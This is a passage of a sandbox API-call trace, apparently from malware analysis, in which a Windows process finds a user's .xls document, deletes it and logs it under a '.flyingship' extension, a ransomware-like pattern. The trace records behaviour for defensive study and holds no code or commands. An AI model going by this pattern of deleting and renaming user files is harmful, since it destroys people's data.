HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFilePart=0x0) returned 0x39 [0174.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0xd11d000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0x90ae18 [0174.004] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mv3nzu4vwv4hc.xls")) returned 1 [0174.008] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0xd11d000, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 0 [0174.008] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0174.008] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.009] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0174.009] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0174.009] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0174.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0174.009] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0174.009] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0174.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0174.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0174.010] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0174.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0174.010] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0174.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.012] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0174.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0174.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0174.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.013] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0174.013] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x13b2, lpOverlapped=0x0) returned 1 [0174.013] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0174.013] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x13b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.014] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0174.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0174.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0174.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\n", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\n", lpUsedDefaultChar=0x0) returned 71 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0174.014] WriteFile (in: hFile=0x138, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0174.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.014] CloseHandle (hObject=0x138) returned 1 [0174.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0174.016] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0174.016] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0174.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0174.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0174.018] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0174.018] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0174.018] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0174.018] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0174.019] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0174.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0174.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0174.019] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.019] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0174.020] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0174.020] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0174.021] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 